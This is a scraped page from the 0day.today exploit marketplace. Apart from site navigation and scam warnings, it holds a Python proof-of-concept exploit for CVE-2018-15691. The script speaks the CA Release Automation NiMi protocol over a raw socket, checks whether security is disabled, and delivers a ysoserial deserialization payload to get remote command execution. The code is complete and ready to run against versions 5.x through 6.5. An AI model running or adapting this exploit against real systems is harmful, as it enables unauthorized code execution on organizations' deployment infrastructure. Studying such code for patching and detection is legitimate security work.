0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
CA Release Automation NiMi 6.5 - Remote Command Execution Exploit
# Exploit Title: CA Release Automation NiMi 6.5 - Remote Command Execution # Exploit Authors: Jakub Palaczynski, Maciej Grabiec # Vendor Homepage: http://www.ca.com/ # Software Link: https://docops.ca.com/ca-release-automation/5-5-2/en/installation/deploy-agents/ # Version: CA Release Automation (NiMi) 5.X, 6.3, 6.4, 6.5 # CVE: CVE-2018-15691 # Info: CA Release Automation (NiMi) Remote Command Execution via Deserialization # Info: Payloads generated using CommonsCollections1 from ysoserial work correctly. # Info: Proof of Concept exploits NiMi service if security is turned off. #!/usr/bin/python import socket import sys import struct if len(sys.argv) < 4: sys.stderr.write("[-]Usage: python %s <ip> <port> <payload_file> <target_nodeid - not mandatory>\n" % sys.argv[0]) sys.stderr.write("[-]Exemple: python %s 10.0.0.1 6600 /tmp/payload.bin\n" % sys.argv[0]) exit(1) host = sys.argv[1] port = sys.argv[2] file = sys.argv[3] # check if payload does not exceed specified value payloadObj = open(file,'rb').read() if len(payloadObj) > 5729: print 'Payload must be less than 5730 bytes. Try another one.' exit(1) # open socket to nimi port sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print 'Connecting to node.' sock.connect((host, int(port))) # say hello to nimi sock.recv(256) sock.send('\x00\x00\x00\x0c\x0a\x04\x6e\x6f\x64\x65\x10\x0a\x72\x02\x08\x00') # first required message # get Node ID data = sock.recv(256) name = data[5] + data[6:6+ord(data[5])] if len(sys.argv) == 5: name = struct.pack(">B", len(sys.argv[4])) + sys.argv[4] # check if security is enabled sock.send('\x00\x00\x00\x1a\x0a\x04\x6e\x6f\x64\x65\x10\x0a\x7a\x10\x0a\x0c\x0a\x07\x30\x2e\x30\x2e\x30\x2e\x30\x10\x94\x3c\x10\x00') # second required message check = sock.recv(256) if check == "": print 'Security is enabled. Sorry.' exit(1) # send payload print 'Sending payload.' header = '\x0a\x04\x6e\x6f\x64\x65\x10\x01\x1a' + name + '\x2a\xe4\x2c\x0a\xe1\x2c' stage = header + payloadObj + '\x90' * (5729-len(payloadObj)) payload = struct.pack(">I", len(stage)) + stage sock.sendall(payload) sock.close() # 0day.today [2024-07-07] #